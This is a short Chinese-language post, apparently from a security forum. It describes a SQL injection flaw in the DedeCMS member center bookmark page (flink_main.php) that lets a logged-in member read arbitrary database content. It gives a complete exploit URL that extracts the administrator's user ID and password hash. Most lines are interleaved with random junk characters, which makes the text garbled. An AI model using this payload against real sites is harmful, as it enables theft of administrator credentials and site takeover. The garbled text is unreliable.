DedeCMS会员中心SQL注射漏洞
( ?: _4 c, w# W' Z: O需要magic_quotes_gpc = Off9 d: v& K4 L6 B. Q1 n
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.! w* i' v% C4 O6 n M4 J
2 P/ O3 C6 Y. N1 e' G- u( n
DedeCMS会员中心书签管理SQL注射漏洞
2 C! Q, I3 X6 i9 X, P; b成功利用该漏洞可获得管理员密码
; N+ }) i8 K# f& T
W- p: W' T7 n3 a& c+ U; e会员登录后可以执行SQL语句查询数据库任意内容如管理员密码, \& s( ?' U$ ` B9 ~8 l
# l) Y0 |$ f) P( X! |9 k( k
http://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r
# L7 j8 S9 s( N+ n |